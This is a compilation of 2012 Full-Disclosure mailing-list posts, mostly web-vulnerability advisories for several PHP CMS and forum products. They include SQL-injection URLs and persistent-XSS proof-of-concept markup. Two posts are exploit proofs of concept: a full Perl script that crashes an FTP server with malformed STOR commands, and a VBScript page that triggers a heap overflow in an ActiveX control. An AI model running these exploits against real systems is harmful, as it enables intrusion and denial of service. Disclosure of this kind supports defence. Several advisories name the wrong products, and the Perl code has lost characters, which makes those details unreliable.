[Full-disclosure] Event Calendar PHP 1.2 - Multiple Web Vulnerabilites
Title: == Event Calendar PHP 1.2 - Multiple Web Vulnerabilites Date: = 2012-06-19 References: === http://www.vulnerability-lab.com/get_content.php?id=607 VL-ID: = 607 Common Vulnerability Scoring System: 7.1 Introduction: = Event Calendar PHP main features: simple and user friendly admin area any language support full control over the CSS of calendar and events style one single step installation easy to include into your webpage - just drop a single line of code create unlimited number of calendars per website each event have date, start time, end time, title, price, maximum attendance, description and event photo/image different types for showing events on the calendar - in the calendar date cell, with tooltips, with popup window option to hide expired events from calendar fully readable and simple php source code W3C validated events RSS feed You can see the demo of Event Calendar PHP. Also check the administrator area. If needed, we can modify your Event Calendar PHP script for a reasonable price. FREE INSTALLATION - If you are having trouble with the installation, we will do it free for you. Just email us at i...@eventcalendarphp.com Requirements: PHP 4.3 or higher and MySQL 3 or higher running on your webserver. Current stable version of Event Calendar PHP is 1.2 ( Copy of the Vendor Homepage: http://www.eventcalendarphp.com ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple web vulnerabilites in Event Calendar PHP 1.2 CMS. Report-Timeline: 2012-06-17: Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: 1.1 Multiple SQL Injection vulnerabilities are detected in the Funeral Script PHP Content Management System. The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on the affected application dbms without user inter action. The vulnerabilities are located in the funeral_script.php admin.php files and the bound vulnerable parameters orderBy, orderType hide_cat. Successful exploitation of the vulnerability results in dbms application compromise. Vulnerable File(s): [+] admin.php [+] preview.php Vulnerable Parameter(s): [+] orderBy [+] orderType 1.2 Multiple persistent input validation vulnerabilities are detected in the Funeral Script PHP Content Management System. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The vulnerabilities are located in the Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action privileged application user account. Vulnerable Section(s): [+] Event - Input Listing [+] Calender - Input Listing Vulnerable Module(s): [+] [Calender - Name|Title Listing] [+] [Event - Name|Title Listing] Vulnerable Parameter(s): [+] newCal - name [+] newEvent - title 1.3 Multiple non persistent cross site scripting vulnerabilities are detected on the ME Firewall Analyzer v7.2 Application. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter action or local low privileged user account. Exploitation requires low user inter action or low privileged application user account. The bugs are located in the admin.php funeral_script.php files with the bound vulnreable parameters orderBy, search, orderType, p, hide_cat obit_id. Successful exploitation can result in account steal, phishing client-side content request manipulation. Vulnerable File(s): [+] admin.php [+] preview.php Vulnerable Parameter(s): [+] cal_id, cal_month cal_year [+] act [+] search Proof of Concept: = 1.1 The sql injection vulnerabilities can be exploited by remote attackers with privileged user accounts without required user inter action. For demonstration or reproduce ... http://127.0.0.1:80/eventcalendar/admin.php?act=calendarsorderType=DESCsearch=orderBy=-1%27[SQL-INJECTION]cal_namecal_id=2 http://127.0.0.1:80/eventcalendar/admin.php?act=calendarsorderType=-1%27[SQL-INJECTION]search=orderBy=cal_namecal_id=2 http://127.0.0.1:80/eventcalendar/admin.php?act=eventsorderType=ASC-1%27[SQL-INJECTION]orderBy=event_titlecal_id=2
[Full-disclosure] Lepton v1.2.0 CMS - Multiple Web Vulnerabilities
Title: == Lepton v1.2.0 CMS - Multiple Web Vulnerabilities Date: = 2012-06-23 References: === http://www.vulnerability-lab.com/get_content.php?id=626 VL-ID: = 626 Common Vulnerability Scoring System: 4 Introduction: = LEPTON is an easy-to-use but full customizable Content Management System (CMS). LEPTON enables you to run nearly all the websites most others current CMS promise you but has the big advantage of extremely short learning and training curves, and this is a great argument to those who work with LEPTON. LEPTON needs a MySQL database, the most common database on webspaces. LEPTON is easily installed and started, and - what is really important - can easily be adapted to fit the needs of nearly all web appearences. Besides many other features LEPTON got ... easy to use backend content input via wysiwyg-editors multi-language-support file and media management design via template system addons to extend cms scaling access system and much more... (Copy of the Vendor Homepage: http://www.lepton-cms.org/english.php?lang=EN ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the Lepton v1.2.0 Content Management System. Report-Timeline: 2012-06-23: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in iScripts Reserve Logic v1.2 Booking Content Management System. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerabilities are located in the modify groups, add user, listing, Profile add page module(s) with the bound vulnerable parameters Groupname, Username, Display Name list_page_title. Exploitation requires low user inter action privileged application user account. Successful exploitation of the vulnerability can lead to session hijacking (admin) or stable (persistent) context manipulation. Vulnerable Module(s): [+] Modify Groups - Group [+] Access - Add User [+] Preferences - My Settings - Profile [+] Add Page Vulnerable Parameter(s): [+] Group Name [+] Username [+] Display Name [+] list_page_title url (modify_link) Proof of Concept: = The persistent web vulnerabilities can be exploited by remote attacker with privileged user account or without user account. To exploit the vulnerability low or medium user inter action is required. For demonstration or reproduce ... Review: Access - Add User Username form name=user action=http://demo.xxx.com/lepton/admins/users/add.php?leptoken=462c08f506b7992a08a40z1340321337; method=post class= input name=user_id value= type=hidden input name=username_fieldname value=username_Age0ll2 type=hidden pMinimum length for user name: 3 chars, Minimum length for Password: 6 chars!/p table 0= border=0 cellpadding=0 cellspacing= width=100% tbodytr td width=150Username:/td td class=value_input input name=username_Age0ll2 value=\ type=text[PERSISTENT INJECTED SCRIPT CODE])' = /td /tr tr tdPassword:/td td class=value_input input type=password name=password value=[PERSISTENT INJECTED SCRIPT CODE]) / /td /tr tr tdRe-type Password:/td td class=value_input input type=password name=password2 value=[PERSISTENT INJECTED SCRIPT CODE] / /td URL: http://127.0.0.1:8080/lepton/admins/users/index.php?leptoken=0644c1632f2de642c422az1340321400 Review: Preferences - My Settings - Profile Displayname optgroup label=Pagesoption value=pages/modify.php?page_id=2 selected=selected [PERSISTENT INJECTED SCRIPT CODE]/option option value=pages/modify.php?page_id=1hello world/option /optgroup/select URL: http://127.0.0.1:8080/lepton/admins/preferences/index.php?leptoken=43842ae95ec290c5dc346z1340321767 Review: Modify Groups - Group table border=0 cellpadding=2 cellspacing=0 width=100% tbodytr td width=150Name:/td td input name=group_name maxlength=255 type=text[PERSISTENT INJECTED SCRIPT CODE]' = style=width: 98%; /td URL: http://127.0.0.1:8080/lepton/admins/groups/groups.php?leptoken=b966d35413402c86743a7z1340321327 Review: Add Page - Listing (url or link) img src=index.php2-Dateien/visible_16.png alt=Visibility: Public class=page_list_rights span class=modify_link[PERSISTENT INJECTED SCRIPT CODE]) /span/a /td td class=list_page_title[PERSISTENT INJECTED SCRIPT CODE]) /td td class=list_page_URL/hello-world/[PERSISTENT INJECTED SCRIPT CODE]28vl29.php/td td class=list_page_id2/td URL:
[Full-disclosure] VamCart v0.9 CMS - Multiple Web Vulnerabilities
Title:
==
VamCart v0.9 CMS - Multiple Web Vulnerabilities
Date:
=
2012-06-25
References:
===
http://www.vulnerability-lab.com/get_content.php?id=622
VL-ID:
=
622
Common Vulnerability Scoring System:
4
Introduction:
=
VamCart is a Free, Open Source, CakePHP Based Shopping Cart Content Management
System. VamCart is a Open Source Project under
the GNU GPL license with the following features ...
Easy Installation.
SEO - Search Engine Optimization.
Unlimited Categories, Products.
CakePHP, MVC, Smarty.
Multi Language, Multi Currency.
Templatable.
Open Source.
Automatic Image Resize.
Product Reviews.
Coupons ...
(Copy of the Vendor Homepage: http://vamcart.com )
Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Web
Vulnerabilities in the VamCart v0.9 Content Management System.
Report-Timeline:
2012-06-25: Public or Non-Public Disclosure
Status:
Published
Exploitation-Technique:
===
Remote
Severity:
=
Medium
Details:
Multiple persistent input validation vulnerabilities are detected in the
VamCart v0.9 Content Management System.
The bugs allow remote attackers to implement/inject malicious script code on
the application side (persistent). The persistent
vulnerabilities are located in the manage accounts, manage coupons, view orders
or order comments module(s) with the bound
vulnerable parameters comment text, coupon code, title name. Exploitation
requires low user inter action privileged application
user account. Successful exploitation of the vulnerability can lead to session
hijacking (admin) or stable (persistent) context manipulation.
Vulnerable Module(s):
[+] Account Manage Accounts Admins Listing
[+] Manage Coupons Listing
[+] View All Orders Listing
[+] Order Comments Listing
Vulnerable Module(s):
[+] Title
[+] Name
[+] Coupon Code
[+] Comments Text
Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by low
privileged user accounts with low required user inter action.
For demonstration or reproduce ...
Review: Users [View All] INDEX - Account Listing
tbodytrthTitle/th thAction/th/trtr class=contentRowEven
onmouseout=this.className='contentRowEven';
onmouseover=this.className='contentRowEvenHover';tdadmin/td
td align=centera href=http://127.0.0.1:1338/cmspath/users/
admin_delete/1 onclick=return confirm('Confirm delete action?');img
src=Admins%20Listing-Dateien/delete.png alt=Delete
/a/td/trtr class=contentRowOddHover
onmouseout=this.className='contentRowOdd'; onmouseover=this.className='
contentRowOddHover';tdiframe src=Admins%20Listing-Dateien/[PERSISTENT
SCRIPT CODE] = td=
td align=centera href=127.0.0.1:1338/cmspath/users/admin_delete/2
URL: http://127.0.0.1:1338/[PATH CMS]/users/admin/
Review: Orders [View All] INDEX via Add - Orders Listing
tr class=contentRowEven onmouseout=this.className='contentRowEven';
onmouseover=this.className='contentRowEvenHover';
td9 minutes ago/td tdimg src=view-allorders.1-Dateien/true.png
alt=True/td tdiframe src=
view-allorders.1-Dateien/[PERSISTENT SCRIPT CODE] ' =[PERSISTENT SCRIPT
CODE] ) [PERSISTENT SCRIPT CODE] )
[PERSISTENT SCRIPT CODE] [PERSISTENT SCRIPT CODE] iframe src=a
onload=alert(VL)
/td/tr/table/divdiv
URL: http://127.0.0.1:1338/[PATH CMS]/orders/admin/
Review: Manage Coupons - Coupon Code Listing
tbodytrthName/th thCode/th thAction/th/trtr
class=contentRowEven onmouseout=this.className='
contentRowEven'; onmouseover=this.className='contentRowEvenHover';tda
href=http://127.0.0.1:1338/module_coupons/admin/
admin_edit/1no ^^ /a/td td
[PERSISTENT SCRIPT CODE])' = td= tda
URL: http://127.0.0.1:1338/[PATH CMS]/module_coupons/admin/admin_index/
Risk:
=
The security risk of the persistent web vulnerabilities are estimated as medium.
Credits:
Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri
(b...@vulnerability-lab.com)
Disclaimer:
===
The information provided in this advisory is provided as it is without any
warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential
or incidental damages so the foregoing limitation
may
[Full-disclosure] SMF Board v2.0.2 - Multiple Web Vulnerabilities
Title: == SMF Board v2.0.2 - Multiple Web Vulnerabilities Date: = 2012-06-25 References: === http://www.vulnerability-lab.com/get_content.php?id=596 VL-ID: = 624 Common Vulnerability Scoring System: 4.1 Introduction: = Simple Machines Forum — SMF in short — is a free, professional grade software package that allows you to set up your own online community within minutes. Its powerful custom made template engine puts you in full control of the layout of your message board and with our unique SSI - or Server Side Includes - function you can let your forum and your website interact with each other. SMF is written in the popular language PHP and uses a MySQL database. It is designed to provide you with all the features you need from a bulletin board while having an absolute minimal impact on the resources of the server. SMF is the next generation of forum software - and best of all it is and will always remain completely free! (Copy of the Vendor Homepage: http://www.simplemachines.org/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official SMF v2.0.2 (Forum Application). Report-Timeline: 2012-06-23: Public or Non-Public Disclosure Status: Published Affected Products: == SMF Product: Simple Machines Forum v2.0.2 Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in the official SMF v2.0.2 (Board|Forum Application) CMS. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerabilities are located in the package manager, smiley sets, newsletter and edit members or groups with the vulnerable bound post parameters local path url, username, url, emails title. Exploitation requires low user inter action privileged application user account. Successful exploitation of the vulnerability can lead to session hijacking (admin/mod/user) or stable (persistent) manipulation of the web application context. Vulnerable Section(s): [+] Package Manager Download New Packages FTP Information Required [+] Smiley Sets Add [+] Newsletter Add [+] My Community Administration Center Membergroups Edit Membergroups Vulnerable Module(s): [+] Local path to SMF Username [Packages] [+] URL [+] Name of emails [+] Name Group Title Proof of Concept: = The persistent input validation vulnerability can be exploited by remote attacker with local low privileged user account low required user inter action. For demonstration or reproduce ... Review: Package Manager Download New Packages FTP Information Required (Listing) dd input size=30 name=ftp_server id=ftp_server type=text[PERSISTENT SCRIPT CODE]' = class=input_text label for=ftp_portPort:nbsp;/label input type=text size=3 name=ftp_port id=ftp_port value=21 class=input_text / ... or dd input size=50 name=ftp_path id=ftp_path value=public_html/demo/smf type=text[PERSISTENT SCRIPT CODE])' = style=width: 99%; class=input_text /dd /dl div class=righttext URL: http://127.0.0.1:1339/smf/index.php?action=admin;area=packages;sa=packageget;get;f5073d7837d8=5a2bdd540a245be265f26c102fff9626 Review: Smiley Sets Add tr class=windowbg id=list_smiley_set_list_0 td style=text-align: center;/td td class=windowbgAkyhne's Set/td td class=windowbg[PERSISTENT SCRIPT CODE]' = strong= akyhne/strong/.../td URL: http://127.0.0.1:1339/smf/index.php?action=admin;area=smileys;sa=modifyset;set=2 Review: Newsletter Add input name=email_force value=0 type=hidden input name=total_emails value=1 type=hidden input name=max_id_member value=13 type=hidden input name=groups value=0,1,2,3 type=hidden input name=exclude_groups value=0,1,2,3 type=hidden input name=members value= type=hidden input name=exclude_members value= type=hidden input name=emails value= type=hidden[PERSISTENT SCRIPT CODE])' = /form /div br class=clear / /div URL: http://127.0.0.1:1339/smf/index.php?action=admin;area=news;sa=mailingmembers;b74f235ec=2b30f2b9aad6e26815e1c18594922b37 Review: Edit Membergroups User/Groups Listing h3 class=catbgEdit Membergroup - [PERSISTENT SCRIPT CODE])' =[PERSISTENT SCRIPT CODE]) ifram /h3 /div div class=windowbg2 span class=topslicespan/span/span URL: http://127.0.0.1:1339/smf/index.php?action=admin;area=membergroups;sa=index;b74f235ec=2b30f2b9aad6e26815e1c18594922b37 URL: http://127.0.0.1:1339/smf/index.php?action=admin;area=membergroups;sa=add;b74f235ec=2b30f2b9aad6e26815e1c18594922b37 Risk: = The
[Full-disclosure] PBBoard v2.1.4 CMS - Multiple Web Vulnerabilities
Title: == PBBoard v2.1.4 CMS - Multiple Web Vulnerabilities Date: = 2012-06-26 References: === http://www.vulnerability-lab.com/get_content.php?id=623 VL-ID: = 625 Common Vulnerability Scoring System: 4.5 Introduction: = PBBoard forum is a free and very famous flat-forum bulletin board software. - LICENSE: http://www.pbboard.com/manual/license.txt - INSTALL And UPGRADE : http://www.pbboard.com/pbb_manual/README.html - English Style : http://www.pbboard.com/forums/t6478.html - Languages : http://www.pbboard.com/forums/index.php?page=pagesshow=1id=6 - Converter: http://www.pbboard.com/forums/index.php?page=pagesshow=1id=3 - contact us: http://www.pbboard.com/forums/index.php?page=sendsendmessage=1 (Copy of the Vendor Homepage: http://www.pbboard.com/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple Web vulnerabilities in the PBBoard v2.1.4 forum application. Report-Timeline: 2012-06-26: Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: A persistent web vulnerability is detected in the PBBoard v2.1.4 forum application. The bug allows remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerability is located in the add poll function when adding a thread. The malicious code can be injected in the `answer field`. The output listing page with the pool executed the malicious persistent script code (JS/HTML). Successful exploitation of the vulnerability can lead to stable (persistent) context manipulation. Exploitation requires low user inter-action. Vulnerable Module(s): [+] Add thread Add poll Vulnerable Parameter(s): [+] [Answer] Proof of Concept: = The persistent input validation vulnerabilities can be exploited by remote attackers with low privileged user account required user inter action. For demonstration or reproduce ... To reproduce the vulnerability, the attacker should add a new thread and the check on the add poll button. After that the attacker can add his malicious code in the answer field of the poll. Anyone who's viewing that thread will be exploited by the malicious code. Such attack can result in session hijacking, redirecting or cookie theft. Moreover, the persistent XSS can be exploited to launch a CSRF attack to the user and to exploit the other CSRF vulnerabilities in the same product to completely hack the application. Poll: iframe src=http://www.vuln-lab.com/iframe ! /span /td /tr tr align=center td class=thead width=95% colspan=3 Question :strongiframe src=http://www.vuln-lab.com/iframe !/strong /td /tr tr td class=row1 width=50% input type=radio name=answer value=0 iframe src=http://www.vw.de/iframe/td td class=row1 width=40% img src=look/styles/forum/main/images/bar_right.gif alt= width=4 height=11img src=look/styles/forum/main/images/bar.gif alt= width=0 height=11img src=look/styles/forum/main/images/bar_left.gif alt= width=4 height=11 /td td class=row1 width=12% align=center Voters: 0 /td /tr tr td class=row1 width=50% input type=radio name=answer value=1 [PERSISTENT SCRIPT CODE]/iframe/td td class=row1 width=40% img src=look/styles/forum/main/images/bar_right.gif alt= width=4 height=11 img src=look/styles/forum/main/images/bar.gif alt= width=0 height=11 img src=look/styles/forum/main/images/bar_left.gif alt= width=4 height=11 /td td class=row1 width=12% align=center Risk: = The security risk of the persistent input validation vulnerabilities is estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] -Ibrahim El-Sayed [the StOrM) (st...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Domains:www.vulnerability-lab.com - www.vuln-lab.com Contact:ad...@vulnerability-lab.com -
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
On Jul 13, 2012, at 11:07, Tim tim-secur...@sentinelchicken.org wrote: This is complicated, but it's not that much more complicated than what existing MitM tools, such as sslstrip, already do. Better. I'm fairly certain this entire attack could be automated/orchestrated with mitmproxy with close to zero code changes. Only hard part is the procurement of a ca that will work on the target or finding some behind the firewall app to target that already uses a self-signed/invalid cert the users are used to clicking through. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Blackboard Mobile Learn v3.0 - Persistent Web Vulnerability
Title: == Blackboard Mobile Learn v3.0 - Persistent Web Vulnerability Date: = 2012-05-29 References: === http://www.blackboard.com/Platforms/Learn/Overview.aspx VL-ID: = 580 Common Vulnerability Scoring System: 3.5 Introduction: = Blackboard Learn technology helps you make learning more effective in and beyond the traditional walls. Breathing life into educational content. Bringing efficiency to day-to-day tasks. Empowering instructors with tools to engage every learner. Motivating them on the devices they rely on. Promoting collaboration and streamlining processes. You’ll have the right toolkit —one that is proven and constantly evolves to meet your needs. It will be flexible and easy to use—from managing content, engaging learners to assessing outcomes. And we’ll help you manage change and increase adoption. Blackboard Mobile Learn Features U.S. Higher Ed / Professional Ed Clients K-12 Clients Global Clients Blackboard Mobile Central Share This Page Blackboard Mobile™ Learn All your learning resources at their fingertips. The Blackboard Mobile™ Learn platform takes interactive teaching and learning mobile, giving students and educators access to their courses, content and organizations on a variety of devices including iOS®, Android™, BlackBerry®, and webOS® smartphones. Abstract: = The Vulnerability Laboratory Research Team discovered Persistent cross site scripting in Blackboard Learn v9. Report-Timeline: 2012-05-29: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in the Blackboard Learn v9 mobile application. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerability is located in the Question answer module with the bound vulnerable smart text parameter. Successful exploitation of the vulnerability can lead to persistent session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action privileged user account. Vulnerable Module(s): [+] Question answer Vulnerable Parameters(s): [+] smart text - input Proof of Concept: = The persistent vulnerability can be exploited by remote attacker with low required user inter action. For demonstration or reproduce ... If there is a survey that is created by the administrator of the Blackboard and in that survey, there are some questions that you answer them, you can inject a malicious code as the answer of such a question. note: it is working when the input type of the answer is Smart Text, HTML, but not tested on TEXT as input. More details in image attached Solution: = There should be a validation on the input of the answer to survey questions. Also parse the section were the script is getting executed. Moreover, it should be filtering or exception for some suspicious words i.e., iframe, script, tags etc. Risk: = The security risk of the persistent input validation vulnerabilities are estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Domains:www.vulnerability-lab.com - www.vuln-lab.com Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
You are absolutely right. I guess we can no longer suppose factoring large primes is hard either. Fuck that baby, the bath water is dirty! -- Douglas Huff On Jul 13, 2012, at 12:00, Григорий Братислава musntl...@gmail.com wrote: PS (is excuse my manner) is no take my message about your is nonsense personal Tim. MusntLive is most respect Chicken Soldiers and Soldier Chickens. MusntLive is never discriminate even is against poultry. MusntLive is support PETA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
On Jul 13, 2012, at 13:24, Gage Bystrom themadichi...@gmail.com wrote: Well if I understand Tim correctly you wouldn't need a CA. In the attack he mentioned not once do you ever actually look at the ssl content. He's talking about redirecting them to plain http and then setting the session cookie and redirecting them back. You're right. I misread slightly. Same tool would still work just scrap the ca comment. :)___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Linux - Indicators of compromise
Greetings FD, Does anyone have any guidelines/useful material on analysis logs of a Linux machine to detect signs of compromise? The data collection piece is not a challenge as a lot of useful information can be captured using commands and some scripts. I'm wondering if there is any systematic approach to analyze the collected logs? Most of the materials I've seen are more aligned to malware and rootkit detection which is not the only concern apparently. Thanks, Ali . - Sent from my BlackBerry device ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Telnet Ftp Server = Memory Corruption PoC
# Exploit Title: Telnet Ftp Server = Memory Corruption PoC
# crash:http://img40.imageshack.us/img40/595/ftpqm.jpg
# Date: July 7, 2012
# Author: coolkaveh
# coolka...@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.slimbyte.sufx.net/
# also download link available at : http://telnet-ftp-server.en.softonic.com/
# Version: 1.0 build(1.218)
# Tested on: windows 7 SP1
#~~~
# Crappy Telnet Ftp Server Memory Corruption PoC
#~~~
#!/usr/bin/perl -w
use IO::Socket;
use Thread;
$|=1;
$host=shift;
$port=shift || 21;
if(!defined($host)){
print(usage: $0 \$host [\$port]\n);
exit(0);
}
$check_first=IO::Socket::INET-new(PeerAddr=$host,PeerPort=$port,Timeout=60);
if(defined $check_first){
print $host - $port is alive.\n;
$check_first-close;
}else{
die($host - $port is closed!\n);
}
@bf1=(
'A'x5,
);
@bf2=(
'!)!)',
);
@bf3=(
'0',
);
@t=@bf1;
push(@t, @bf2);
push(@t, @bf3);
sub check(){
#Thread-self-detach;
$sock=IO::Socket::INET-new(PeerAddr=$host,PeerPort=$port,Timeout=60);
if(defined $sock){
#print $host - $port is alive.\n;
undef($content_tmp);
$sock-recv($content_tmp,100,0);
if(length($content_tmp)0){
$sock-close;
return 1;
}else{
$sock-close;
return 0;
}
}else{
#print($host - $port is closed!\n);
return 0;
}
}
#set PASV Mode send Socket
sub send_sock($){
$send_port_num=shift;
Thread-self-detach;
$send_sock_tmp=IO::Socket::INET-new(PeerAddr=$host,
PeerPort=$send_port_num, Proto='tcp', Timeout=30);
if(defined($send_sock_tmp)){
$send_sock_tmp-recv($mem,100,0);
print $mem\n;
$mem=0;
$send_sock_tmp-close;
undef($send_port_num);
return 1;
}else{
undef($send_port_num);
return 0;
}
}
print Please enter the real username: ;
$real_username=STDIN;
chop($real_username);
print Please enter the real password: ;
$real_password=STDIN;
chop($real_password);
@cm=(
'STOR',
'STOR',
);
$sock3=IO::Socket::INET-new(PeerAddr=$host, PeerPort=$port,
Proto='tcp', Timeout=30);
if(defined($sock3)){
$sock3-recv($content, 100, 0);
print $content\n;
sleep(2);
$sock3-send(USER .$real_username\r\n, 0);
sleep(2);
$sock3-recv($content, 100, 0);
print $content\n;
sleep(2);
$sock3-send(PASS .$real_password\r\n, 0);
sleep(2);
$sock3-recv($content, 100, 0);
print $content\n;
sleep(2);
if($content=~m/^230/){
$sock3-close;
}else{
$sock3-close;
die(Username or Password is wrong!\n);
}
}else{
die $host - $port is closed!\n;
}
L_V_J: undef($cmd);
C_L: foreach $cmd (@cm){
foreach $poc (@t){
LABEL5: $sock4=IO::Socket::INET-new(PeerAddr=$host,
PeerPort=$port, Proto='tcp', Timeout=30);
if(defined($sock4)){
$sock4-recv($content, 100, 0);
print $content\n;
sleep(2);
$sock4-send(USER .$real_username\r\n, 0);
sleep(2);
$sock4-recv($content, 100, 0);
print $content\n;
sleep(2);
$sock4-send(PASS .$real_password\r\n, 0);
sleep(2);
$sock4-recv($content, 100, 0);
print $content\n;
sleep(2);
if(($cmd eq 'STOR')){
$sock4-send(PASV\r\n, 0);
sleep(2);
$sock4-recv($content, 100, 0);
print $content\n;
sleep(2);
if($content=~m/\((.*),(.*),(.*),(.*),(.*),(.*)\)/){
$send_port=$5*256+$6;
}
}
}
$sock4-send($cmd. .$poc\r\n, 0);
Thread-new(\send_sock,$send_port);
$sock4-send($cmd. .$poc\r\n, 0);
sleep(2);
$sock4-recv($content, 100, 0);
$thread3=Thread-new(\check);
undef($thread3);
$sock4-send(QUIT\r\n, 0);
}
}
[Full-disclosure] beSTORM ActiveX (WinGraphviz.dll) Remote Heap Overflow
Exploit Title: beSTORM ActiveX (WinGraphviz.dll) Remote Heap Overflow PoC Date: July 15, 2012 Author: coolkaveh coolka...@rocketmail.com Https://twitter.com/coolkaveh Vendor Homepage: http://www.beyondsecurity.com/ Version: 3.5.6 Tested on: windows 7 SP1 Exploiting the Exploiters What kind of crappy fuzzer is that ? == Registers: -- EIP 01637FFB EAX 41414141 EBX 0163 - 00905A4D - Asc: MZMZ ECX 016FF838 - Asc: @A EDX 41414141 EDI ESI EBP 0013FD24 - 0013FD34 ESP 0013FD10 - 0013FD34 Block Disassembly: -- 1637FE9 CMP DWORD PTR [EAX+10],0 1637FED JE SHORT 01638042 1637FEF MOV ECX,[EBP+8] 1637FF2 MOV EDX,[ECX+10] 1637FF5 MOV [EBP-4],EDX 1637FF8 MOV EAX,[EBP-4] 1637FFB CMP DWORD PTR [EAX],0 --- CRASH 1637FFE JE SHORT 01638042 1638000 MOV ECX,[EBP-4] 1638003 CMP DWORD PTR [ECX+10],0 1638007 JE SHORT 0163801B 1638009 MOV EDX,[EBP-4] 163800C MOV EAX,[EDX+10] 163800F MOV ECX,[EBP-4] 1638012 MOV EDX,[ECX+10] ArgDump: EBP+8 016FF838 - Asc: @A EBP+12 016FF838 - Asc: @A html Test Exploit page object classid='clsid:684811FB-0523-420F-9E8F-A5452C65A19C' id='fuzzer' /object script language='vbscript' arg1=String(2068, A) fuzzer.ToSvg arg1 /script ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS vulnerabilty on eenmiljardseconden.frankdeboosere.be
Hello, I found an XSS vulnerability in http://eenmiljardseconden.frankdeboosere.be/ . This vulnerability was possible due to invalid input validation/bad programming. The owner was contacted and a satiric fix was deployed. Affected site: http://eenmiljardseconden.frankdeboosere.be/ (media stunt of Flemish television weather forecast presentator) Details: After entering a message on the Stuur een bericht naar de toekomst-page, you are presented an unique number of your request, to track it. You were then redirected to http://eenmiljardseconden.frankdeboosere.be/messagesent/id/[number of your request]. The number could be replaced by any value to inject content into the page. It is now solved, and if you try to execute it again, you get a link to Rick Astley's Never gonna give you up on YT. Timeline: 2012-05-29 - discovery and owner notification. 2012-05-30 - Fix 2012-05-31 - Disclosure at 42(at)discuss.hackerspaces.be mailinglist. Regards, Yvan Janssens ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS vulnerabilty on eenmiljardseconden.frankdeboosere.be
